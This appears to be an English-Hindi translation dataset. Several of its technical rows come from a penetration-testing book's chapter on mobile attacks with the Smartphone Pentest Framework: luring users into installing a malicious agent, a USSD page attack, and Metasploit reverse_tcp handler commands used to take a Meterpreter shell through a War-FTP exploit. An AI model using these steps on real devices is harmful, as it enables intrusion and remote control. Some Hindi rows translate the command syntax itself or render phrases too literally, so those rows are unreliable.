en
stringlengths
4
3.31k
translation
stringlengths
5
3.49k
target_lang
stringclasses
10 values
domain
stringclasses
6 values
complexity
stringclasses
3 values
Mobile devices are now entering the workplace en masse.
मोबाइल डिवाइस अब बड़े पैमाने पर कार्यस्थल में प्रवेश कर रहे हैं।
hi
technical
simple
Security teams and pentesters must evaluate the security risks of these devices.
सुरक्षा टीमों और पेंटेस्टरों को इन उपकरणों के सुरक्षा जोखिमों का मूल्यांकन करना चाहिए।
hi
technical
moderate
Developing new mobile attacks and post-exploitation techniques is an ideal place to start with your own security research.
नए मोबाइल हमलों और पोस्ट-एक्सप्लॉयटेशन तकनीकों का विकास आपके अपने सुरक्षा अनुसंधान के साथ शुरू करने के लिए एक आदर्श स्थान है।
hi
technical
complex
We’ll be discussing a tool I created to help pentesters to assess the security posture of mobile devices, the Smartphone Pentest Framework (SPF).
हम एक ऐसे उपकरण पर चर्चा करेंगे जो मैंने पेंटेस्टरों को मोबाइल उपकरणों की सुरक्षा स्थिति का आकलन करने में मदद करने के लिए बनाया है, स्मार्टफोन पेंटेस्ट फ्रेमवर्क (एसपीएफ)।
hi
technical
moderate
After working your way through this book, you will be ready to embark on your own infosec journey.
इस पुस्तक के माध्यम से काम करने के बाद, आप अपनी खुद की सूचना सुरक्षा यात्रा शुरू करने के लिए तैयार होंगे।
hi
technical
moderate
For most of the examples in this chapter, we’ll use the Android platform as a target.
इस अध्याय के अधिकांश उदाहरणों के लिए, हम एंड्रॉइड प्लेटफ़ॉर्म को एक लक्ष्य के रूप में उपयोग करेंगे।
hi
technical
simple
Mobile technology is a rapidly developing field.
मोबाइल तकनीक एक तेजी से विकसित होने वाला क्षेत्र है।
hi
technical
simple
They also have their own unique features that add new attack vectors and protocols to the mix.
उनके पास अपनी अनूठी विशेषताएं भी हैं जो मिश्रण में नए हमले के वैक्टर और प्रोटोकॉल जोड़ती हैं।
hi
technical
moderate
SMS opens up a new social-engineering attack vector.
एसएमएस एक नया सोशल-इंजीनियरिंग हमला वेक्टर खोलता है।
hi
technical
simple
SMS is an ideal vector for spam and phishing attacks.
एसएमएस स्पैम और फ़िशिंग हमलों के लिए एक आदर्श वेक्टर है।
hi
technical
simple
Security-awareness training will need to be augmented to include this threat.
सुरक्षा जागरूकता प्रशिक्षण को इस खतरे को शामिल करने के लिए बढ़ाने की आवश्यकता होगी।
hi
technical
moderate
A user who knows better than to click a random link in a suspicious-looking email may still click a random link in a text message.
एक उपयोगकर्ता जो संदिग्ध दिखने वाले ईमेल में एक यादृच्छिक लिंक पर क्लिक करने से बेहतर जानता है, वह अभी भी एक टेक्स्ट संदेश में एक यादृच्छिक लिंक पर क्लिक कर सकता है।
hi
technical
complex
Mobile devices bring yet another attack vector to the table: near field communication, or NFC.
मोबाइल डिवाइस टेबल पर एक और हमला वेक्टर लाते हैं: निकट क्षेत्र संचार, या एनएफसी।
hi
technical
moderate
NFC allows devices to share data by touching or being near each other.
एनएफसी उपकरणों को एक-दूसरे को छूकर या पास रहकर डेटा साझा करने की अनुमति देता है।
hi
technical
simple
Security awareness training should also teach users to be aware of which NFC tags their device responds to.
सुरक्षा जागरूकता प्रशिक्षण को उपयोगकर्ताओं को इस बारे में भी सिखाना चाहिए कि उनका डिवाइस किन एनएफसी टैग का जवाब देता है।
hi
technical
moderate
QR codes can embed URLs, send data to an application on a mobile device, and so on.
क्यूआर कोड यूआरएल एम्बेड कर सकते हैं, मोबाइल डिवाइस पर एक एप्लिकेशन को डेटा भेज सकते हैं, और इसी तरह।
hi
technical
moderate
That QR code on a store window doesn’t have to point to the store’s website.
स्टोर की खिड़की पर वह क्यूआर कोड स्टोर की वेबसाइट पर इंगित करने के लिए बाध्य नहीं है।
hi
technical
moderate
Malicious QR code attacks have occurred in the wild.
दुर्भावनापूर्ण क्यूआर कोड हमले जंगली में हुए हैं।
hi
technical
simple
Enough talk; let’s turn our attention to actually attacking mobile devices with the help of SPF.
बहुत हो गई बातें; आइए अब हम एसपीएफ की मदद से वास्तव में मोबाइल उपकरणों पर हमला करने पर ध्यान दें।
hi
technical
moderate
SPF is still under active development and its feature set changes rapidly.
एसपीएफ अभी भी सक्रिय विकास के अधीन है और इसकी सुविधा सेट तेजी से बदलती है।
hi
technical
simple
Various USSD tags offer all sorts of functionality.
विभिन्न यूएसएसडी टैग सभी प्रकार की कार्यक्षमता प्रदान करते हैं।
hi
technical
simple
Our example will use a more innocuous payload than the one described previously.
हमारा उदाहरण पहले वर्णित की तुलना में अधिक हानिरहित पेलोड का उपयोग करेगा।
hi
technical
moderate
We’ll have our device automatically dial a code to present its unique identifier in a pop-up.
हमारा उपकरण स्वचालित रूप से एक कोड डायल करेगा ताकि एक पॉप-अप में इसकी विशिष्ट पहचानकर्ता प्रस्तुत की जा सके।
hi
technical
moderate
To run the safe USSD example in SPF, choose menu option 6, then 3.) USSD Webpage Attack (Safe) u.
एसपीएफ में सुरक्षित यूएसएसडी उदाहरण चलाने के लिए, मेनू विकल्प 6 चुनें, फिर 3.) यूएसएसडी वेबपेज अटैक (सुरक्षित) u।
hi
technical
moderate
You’ll be asked for the location of the web server, the name of the malicious page, and the phone number to text it to.
आपको वेब सर्वर का स्थान, दुर्भावनापूर्ण पृष्ठ का नाम और उस पर टेक्स्ट करने के लिए फ़ोन नंबर पूछा जाएगा।
hi
technical
moderate
This time, instead of crashing the browser, the dialer app opens, and a pop-up notification appears.
इस बार, ब्राउज़र क्रैश होने के बजाय, डायलर ऐप खुलता है, और एक पॉप-अप अधिसूचना दिखाई देती है।
hi
technical
moderate
As it turns out, our emulator has no unique identifier, so the number is blank.
जैसा कि पता चला है, हमारे एमुलेटर में कोई विशिष्ट पहचानकर्ता नहीं है, इसलिए नंबर खाली है।
hi
technical
moderate
Though this example was not harmful to the device or its data, other USSD codes can be if they are opened in the dialer.
हालांकि यह उदाहरण डिवाइस या उसके डेटा के लिए हानिकारक नहीं था, अन्य यूएसएसडी कोड हो सकते हैं यदि वे डायलर में खोले जाते हैं।
hi
technical
complex
Android has a complicated relationship with security updates.
एंड्रॉइड का सुरक्षा अपडेट के साथ एक जटिल संबंध है।
hi
technical
moderate
The problem is that anyone can make an Android device with its own implementation of the Android OS.
समस्या यह है कि कोई भी एंड्रॉइड ओएस के अपने कार्यान्वयन के साथ एक एंड्रॉइड डिवाइस बना सकता है।
hi
technical
complex
When Google releases a new version with a set of patches, every original equipment manufacturer (OEM) needs to port the changes to its version of Android, and the carriers need to push updates to their devices.
जब Google पैच के एक सेट के साथ एक नया संस्करण जारी करता है, तो हर मूल उपकरण निर्माता (ओईएम) को परिवर्तनों को एंड्रॉइड के अपने संस्करण में पोर्ट करने की आवश्यकता होती है, और वाहकों को अपने उपकरणों पर अपडेट पुश करने की आवश्यकता होती है।
hi
technical
complex
However, updates are not delivered consistently, which means that millions of unpatched devices may be in use, depending on the model and the carrier.
हालांकि, अपडेट लगातार वितरित नहीं किए जाते हैं, जिसका अर्थ है कि मॉडल और वाहक के आधार पर, लाखों बिना पैच वाले डिवाइस उपयोग में हो सकते हैं।
hi
technical
complex
Now let’s turn our attention to a vulnerability that will probably never be patched: malicious applications.
अब हम एक भेद्यता पर ध्यान दें जिसे शायद कभी पैच नहीं किया जाएगा: दुर्भावनापूर्ण एप्लिकेशन।
hi
technical
moderate
We’ve studied malicious programs intermittently throughout this book.
हमने इस पुस्तक में समय-समय पर दुर्भावनापूर्ण कार्यक्रमों का अध्ययन किया है।
hi
technical
moderate
Mobile users are inundated with reasons to download apps to their devices, and mobile malware is on the rise, much of it in the form of mali- cious applications.
मोबाइल उपयोगकर्ता अपने उपकरणों पर ऐप्स डाउनलोड करने के कारणों से अभिभूत हैं, और मोबाइल मैलवेयर बढ़ रहा है, जिसमें से अधिकांश दुर्भावनापूर्ण अनुप्रयोगों के रूप में हैं।
hi
technical
complex
If a user can be tricked into installing a malicious app, the attacker can utilize Android’s APIs to steal data, gain remote control, and even attack other devices.
यदि किसी उपयोगकर्ता को दुर्भावनापूर्ण ऐप स्थापित करने के लिए धोखा दिया जा सकता है, तो हमलावर डेटा चुराने, रिमोट कंट्रोल हासिल करने और यहां तक कि अन्य उपकरणों पर हमला करने के लिए एंड्रॉइड के एपीआई का उपयोग कर सकता है।
hi
technical
complex
In the Android security model, apps must request permissions to use APIs that could be used maliciously, and users must accept the requested permissions at installation.
एंड्रॉइड सुरक्षा मॉडल में, ऐप्स को उन एपीआई का उपयोग करने के लिए अनुमतियों का अनुरोध करना होगा जिनका दुर्भावनापूर्ण तरीके से उपयोग किया जा सकता है, और उपयोगकर्ताओं को स्थापना पर अनुरोधित अनुमतियों को स्वीकार करना होगा।
hi
technical
complex
We can use Android permis- sions to control the device without running an additional exploit after the user installs the malicious app.
हम उपयोगकर्ता द्वारा दुर्भावनापूर्ण ऐप इंस्टॉल करने के बाद अतिरिक्त शोषण चलाए बिना डिवाइस को नियंत्रित करने के लिए एंड्रॉइड अनुमतियों का उपयोग कर सकते हैं।
hi
technical
complex
SPF allows us to create a malicious app with a variety of interesting func- tionality.
एसपीएफ हमें विभिन्न प्रकार की दिलचस्प कार्यक्षमता के साथ एक दुर्भावनापूर्ण ऐप बनाने की अनुमति देता है।
hi
technical
moderate
Earlier we used the SPF app on our pentester-controlled device to allow SPF to use the device’s mobile modem and other functionality; our goal here is to trick users into installing the SPF agent on target devices.
पहले हमने एसपीएफ को डिवाइस के मोबाइल मॉडेम और अन्य कार्यक्षमता का उपयोग करने की अनुमति देने के लिए अपने पेंटेस्टर-नियंत्रित डिवाइस पर एसपीएफ ऐप का उपयोग किया था; यहां हमारा लक्ष्य उपयोगकर्ताओं को लक्ष्य उपकरणों पर एसपीएफ एजेंट स्थापित करने के लिए धोखा देना है।
hi
technical
complex
The company announced a new product launch next month.
कंपनी ने अगले महीने एक नए उत्पाद के लॉन्च की घोषणा की।
hi
news
simple
Could you please help me with this task?
क्या आप कृपया इस कार्य में मेरी मदद कर सकते हैं?
hi
general
simple
The weather forecast predicts heavy rain for tomorrow.
मौसम विभाग कल भारी बारिश की भविष्यवाणी कर रहा है।
hi
news
simple
I am very happy to see you.
मुझे आपको देखकर बहुत खुशी हुई।
hi
general
simple
The software update is now available for download.
सॉफ्टवेयर अपडेट अब डाउनलोड के लिए उपलब्ध है।
hi
technical
simple
The government is implementing new policies to boost the economy.
सरकार अर्थव्यवस्था को बढ़ावा देने के लिए नई नीतियां लागू कर रही है।
hi
news
moderate
Despite the challenges, the team managed to complete the project on time.
चुनौतियों के बावजूद, टीम समय पर परियोजना को पूरा करने में सफल रही।
hi
general
moderate
The research paper explores the impact of climate change on agriculture.
शोध पत्र जलवायु परिवर्तन के कृषि पर प्रभाव की पड़ताल करता है।
hi
technical
moderate
The CEO addressed the shareholders during the annual general meeting.
सीईओ ने वार्षिक आम बैठक के दौरान शेयरधारकों को संबोधित किया।
hi
news
moderate
The complex algorithm requires significant computational resources.
जटिल एल्गोरिदम को महत्वपूर्ण कम्प्यूटेशनल संसाधनों की आवश्यकता होती है।
hi
technical
moderate
The negotiations between the two countries have reached a critical stage.
दोनों देशों के बीच बातचीत एक महत्वपूर्ण चरण में पहुंच गई है।
hi
news
complex
The philosophical debate delved into the nature of consciousness and existence.
दार्शनिक बहस चेतना और अस्तित्व की प्रकृति में उतर गई।
hi
general
complex
The quantum physics experiment yielded unexpected results, challenging existing theories.
क्वांटम भौतिकी के प्रयोग ने अप्रत्याशित परिणाम दिए, जो मौजूदा सिद्धांतों को चुनौती देते हैं।
hi
technical
complex
The intricate details of the legal proceedings were meticulously examined by the jury.
कानूनी कार्यवाही के जटिल विवरणों की जूरी द्वारा सावधानीपूर्वक जांच की गई।
hi
news
complex
The economic downturn has significantly impacted the global financial markets.
आर्थिक मंदी ने वैश्विक वित्तीय बाजारों को महत्वपूर्ण रूप से प्रभावित किया है।
hi
news
complex
The artist's avant-garde approach to painting revolutionized the art world.
कलाकार के चित्रकला के प्रति अवांट-गार्डे दृष्टिकोण ने कला जगत में क्रांति ला दी।
hi
general
complex
The development of artificial intelligence poses both opportunities and ethical dilemmas.
कृत्रिम बुद्धिमत्ता का विकास अवसर और नैतिक दुविधाएँ दोनों प्रस्तुत करता है।
hi
technical
complex
The intricate interplay of political factors led to the collapse of the coalition government.
राजनीतिक कारकों की जटिल अंतःक्रिया ने गठबंधन सरकार के पतन का नेतृत्व किया।
hi
news
complex
The scientific community is divided on the implications of the new discovery.
वैज्ञानिक समुदाय नई खोज के निहितार्थों पर विभाजित है।
hi
technical
complex
The historical analysis provides a nuanced understanding of the complex socio-political landscape.
ऐतिहासिक विश्लेषण जटिल सामाजिक-राजनीतिक परिदृश्य की एक सूक्ष्म समझ प्रदान करता है।
hi
general
complex
The book uses a layflat binding.
पुस्तक में ले-फ्लैट बाइंडिंग का उपयोग किया गया है।
hi
technical
simple
Visit http://nostarch.com/pentesting/ for updates.
अपडेट के लिए http://nostarch.com/pentesting/ पर जाएं।
hi
technical
simple
The paper is 60# Finch Offset, which is certified by the Forest Stewardship Council (FSC).
पेपर 60# फिंच ऑफसेट है, जो वन प्रबंधन परिषद (FSC) द्वारा प्रमाणित है।
hi
technical
moderate
You’ll find links for the resources used in this book at http://www.nostarch.com/ pentesting/.
आपको इस पुस्तक में उपयोग किए गए संसाधनों के लिंक http://www.nostarch.com/pentesting/ पर मिलेंगे।
hi
technical
moderate
Use the password 1stPentestBook?! to open the 7-Zip archive.
7-ज़िप संग्रह खोलने के लिए पासवर्ड 1stPentestBook?! का उपयोग करें।
hi
technical
simple
You can find 7-Zip programs for Windows and Linux platforms at http :// www.7-zip.org/download.html.
आप विंडोज और लिनक्स प्लेटफार्मों के लिए 7-ज़िप प्रोग्राम http :// www.7-zip.org/download.html पर पा सकते हैं।
hi
technical
moderate
Mac users can use Ez7z from http://ez7z .en.softonic .com/mac/.
मैक उपयोगकर्ता http://ez7z .en.softonic .com/mac/ से Ez7z का उपयोग कर सकते हैं।
hi
technical
simple
If you’re unable to download the files or you’d just like them delivered to your doorstep, we’ll send you a DVD.
यदि आप फ़ाइलों को डाउनलोड करने में असमर्थ हैं या आप उन्हें अपने दरवाजे पर मंगवाना चाहते हैं, तो हम आपको एक डीवीडी भेजेंगे।
hi
technical
moderate
Visit http://www.nostarch.com/pentesting/ for details.
विवरण के लिए http://www.nostarch.com/pentesting/ पर जाएं।
hi
technical
simple
You’ll find additional resources at Georgia Weidman’s website: http :// bulbsecurity.com/.
आपको जॉर्जिया वेइडमैन की वेबसाइट पर अतिरिक्त संसाधन मिलेंगे: http :// bulbsecurity.com/।
hi
technical
moderate
Penetration Testing is set in New Baskerville, TheSansMono Condensed, Futura, and Dogma.
पेनेट्रेशन टेस्टिंग को न्यू बास्कर्विल, द सैंस मोनो कंडेंस्ड, फ्यूटुरा और डॉग्मा में सेट किया गया है।
hi
technical
moderate
The book was printed and bound by Sheridan Books, Inc. in Chelsea, Michigan.
पुस्तक को शेरिडन बुक्स, इंक. द्वारा चेल्सी, मिशिगन में मुद्रित और बांधा गया था।
hi
technical
moderate
The cover is not actually glued to the book’s spine, and when open, the book lies flat and the spine doesn’t crack.
कवर वास्तव में पुस्तक की रीढ़ से चिपका नहीं है, और जब खुला होता है, तो पुस्तक सपाट रहती है और रीढ़ में दरार नहीं पड़ती है।
hi
technical
complex
Updates Visit http://nostarch.com/pentesting/ for updates, errata, and other information.
अपडेट, अशुद्धिपत्र और अन्य जानकारी के लिए http://nostarch.com/pentesting/ पर जाएं।
hi
technical
moderate
phone: 800.420.7240 or 415.863.9900 email: sales@nostarch.com web : w w w.nostarch.com
फ़ोन: 800.420.7240 या 415.863.9900 ईमेल: sales@nostarch.com वेब: w w w.nostarch.com
hi
technical
simple
Downloading the Software to Build Your Virtual Lab
अपने वर्चुअल लैब को बनाने के लिए सॉफ़्टवेयर डाउनलोड करना
hi
technical
simple
You’ll find links for the resources used in this book at http://www.nostarch.com/ pentesting/, including the custom web application, the Ubuntu target, and the Kali Linux virtual machine.
आपको इस पुस्तक में उपयोग किए गए संसाधनों के लिंक http://www.nostarch.com/pentesting/ पर मिलेंगे, जिसमें कस्टम वेब एप्लिकेशन, उबंटू लक्ष्य और काली लिनक्स वर्चुअल मशीन शामिल हैं।
hi
technical
complex
If you’re unable to download the files or you’d just like them delivered to your doorstep, we’ll send you a DVD containing the files for US $10.
यदि आप फ़ाइलों को डाउनलोड करने में असमर्थ हैं या आप उन्हें अपने दरवाजे पर मंगवाना चाहते हैं, तो हम आपको यूएस $10 में फ़ाइलों वाली एक डीवीडी भेजेंगे।
hi
technical
complex
You can find 7-Zip programs for Windows and Linux platforms at http :// www.7-zip.org/download.html.
आप विंडोज और लिनक्स प्लेटफार्मों के लिए 7-ज़िप प्रोग्राम http :// www.7-zip.org/download.html पर पा सकते हैं।
hi
technical
moderate
If you’re unable to download the files or you’d just like them delivered to your doorstep, we’ll send you a DVD.
यदि आप फ़ाइलों को डाउनलोड करने में असमर्थ हैं या आप उन्हें अपने दरवाजे पर मंगवाना चाहते हैं, तो हम आपको एक डीवीडी भेजेंगे।
hi
technical
moderate
We can do the same thing for Android as long as we have an ARM cross compiler.
हम एंड्रॉइड के लिए भी यही काम कर सकते हैं, जब तक हमारे पास एक एआरएम क्रॉस कंपाइलर है।
hi
technical
moderate
Luckily, SPF has one. As shown in Listing 20-23, choose option 9.) Compile code to run on mobile devices from the main menu.
सौभाग्य से, SPF के पास एक है। जैसा कि लिस्टिंग 20-23 में दिखाया गया है, मुख्य मेनू से मोबाइल उपकरणों पर चलाने के लिए कोड संकलित करने के लिए विकल्प 9.) चुनें।
hi
technical
moderate
Compile code to run on mobile devices 1.) Compile C code for ARM Android spf> 1u Compiles C code to run on ARM based Android devices.
मोबाइल उपकरणों पर चलाने के लिए कोड संकलित करें 1.) एआरएम एंड्रॉइड के लिए सी कोड संकलित करें spf> 1u एआरएम आधारित एंड्रॉइड उपकरणों पर चलाने के लिए सी कोड संकलित करता है।
hi
technical
moderate
Supply the C code file and the output filename File to Compile: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter.cv Output File: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter
सी कोड फ़ाइल और आउटपुट फ़ाइलनाम प्रदान करें फ़ाइल संकलित करने के लिए: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter.cv आउटपुट फ़ाइल: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter
hi
technical
complex
Select 1.) Compile C code for ARM Android u. You will be prompted for the C file to compile as well as where you want to put the compiled binary v.
चुनें 1.) एआरएम एंड्रॉइड के लिए सी कोड संकलित करें u. आपको संकलित करने के लिए सी फ़ाइल के साथ-साथ संकलित बाइनरी v को कहां रखना है, इसके लिए संकेत दिया जाएगा।
hi
technical
moderate
Now we need to download the War-FTP exploit to our infected Android device.
अब हमें अपने संक्रमित एंड्रॉइड डिवाइस पर War-FTP एक्सप्लॉइट डाउनलोड करने की आवश्यकता है।
hi
technical
moderate
From the agent commands menu, choose option 6 to download a file.
एजेंट कमांड मेनू से, एक फ़ाइल डाउनलोड करने के लिए विकल्प 6 चुनें।
hi
technical
simple
You will be asked for the file to download and the delivery method, as shown in Listing 20-24.
आपको डाउनलोड करने के लिए फ़ाइल और डिलीवरी विधि के लिए कहा जाएगा, जैसा कि लिस्टिंग 20-24 में दिखाया गया है।
hi
technical
moderate
Select a command to perform or 0 to return to the previous menu spf> 6 Downloads a file to the phone.
निष्पादित करने के लिए एक कमांड चुनें या पिछले मेनू पर वापस जाने के लिए 0 spf> 6 फोन पर एक फ़ाइल डाउनलोड करता है।
hi
technical
moderate
Fill in the file and the delivery method(SMS or HTTP). File to download: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter Delivery Method(SMS or HTTP): HTTP
फ़ाइल और डिलीवरी विधि (एसएमएस या एचटीटीपी) भरें। डाउनलोड करने के लिए फ़ाइल: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter डिलीवरी विधि (एसएमएस या एचटीटीपी): एचटीटीपी
hi
technical
complex
Before we run the exploit, we need to set up a handler in Msfconsole, as shown in Listing 20-25.
एक्सप्लॉइट चलाने से पहले, हमें Msfconsole में एक हैंडलर सेट अप करने की आवश्यकता है, जैसा कि लिस्टिंग 20-25 में दिखाया गया है।
hi
technical
moderate
Open Msfconsole on Kali, and use the multi/handler module, setting the options to match the payload in the War-FTP exploit.
काली पर Msfconsole खोलें, और multi/handler मॉड्यूल का उपयोग करें, वार-एफ़टीपी एक्सप्लॉइट में पेलोड से मेल खाने के लिए विकल्पों को सेट करें।
hi
technical
moderate
msf > use multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp
msf > multi/handler का उपयोग करें msf exploit(handler) > सेट पेलोड windows/meterpreter/reverse_tcp पेलोड => windows/meterpreter/reverse_tcp
hi
technical
complex
msf exploit(handler) > set LHOST 192.168.20.9 LHOST => 192.168.20.9 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.20.9:4444 [*] Starting the payload handler...
msf exploit(handler) > सेट LHOST 192.168.20.9 LHOST => 192.168.20.9 msf exploit(handler) > exploit [*] 192.168.20.9:4444 पर रिवर्स हैंडलर शुरू किया गया [*] पेलोड हैंडलर शुरू हो रहा है...
hi
technical
complex
Finally, it’s time to run the exploit. As shown in Listing 20-26, choose option 7.) Execute Command from the agent commands menu; you will be prompted for the command to run.
अंत में, एक्सप्लॉइट चलाने का समय आ गया है। जैसा कि लिस्टिंग 20-26 में दिखाया गया है, एजेंट कमांड मेनू से विकल्प 7.) कमांड निष्पादित करें चुनें; आपको चलाने के लिए कमांड के लिए संकेत दिया जाएगा।
hi
technical
moderate
Select a command to perform or 0 to return to the previous menu spf> 7 Run a command in the terminal.
निष्पादित करने के लिए एक कमांड चुनें या पिछले मेनू पर वापस जाने के लिए 0 spf> 7 टर्मिनल में एक कमांड चलाएँ।
hi
technical
moderate
Fill in the command and the delivery method(SMS or HTTP). Command: warftpmeterpreter 192.168.20.10 21u Downloaded?: yesv Delivery Method(SMS or HTTP): HTTP
कमांड और डिलीवरी विधि (एसएमएस या एचटीटीपी) भरें। कमांड: warftpmeterpreter 192.168.20.10 21u डाउनलोड किया गया?: हाँv डिलीवरी विधि (एसएमएस या एचटीटीपी): एचटीटीपी
hi
technical
complex
Tell SPF the full command, including arguments u. In this case, we need to tell the exploit the IP address and port to attack.
SPF को पूरा कमांड बताएं, जिसमें तर्क u शामिल हैं। इस मामले में, हमें एक्सप्लॉइट को आईपी पता और हमला करने के लिए पोर्ट बताने की आवश्यकता है।
hi
technical
moderate
SPF asks if the binary was downloaded. If it was downloaded through SPF, it will be in the agent’s files directory, and SPF will need to know to run it from there.
SPF पूछता है कि क्या बाइनरी डाउनलोड की गई थी। यदि इसे SPF के माध्यम से डाउनलोड किया गया था, तो यह एजेंट की फ़ाइलों की निर्देशिका में होगा, और SPF को वहां से इसे चलाने के लिए जानने की आवश्यकता होगी।
hi
technical
moderate
In our case, we answer yes v, then enter the delivery method as usual. Watch your Metasploit listener. In about a minute you should receive a Meterpreter prompt like the one shown next.
हमारे मामले में, हम हाँ v का उत्तर देते हैं, फिर हमेशा की तरह डिलीवरी विधि दर्ज करते हैं। अपने मेटास्प्लाइट श्रोता को देखें। लगभग एक मिनट में आपको एक मीटरप्रेटर प्रॉम्प्ट प्राप्त होना चाहिए जैसे कि अगला दिखाया गया है।
hi
technical
moderate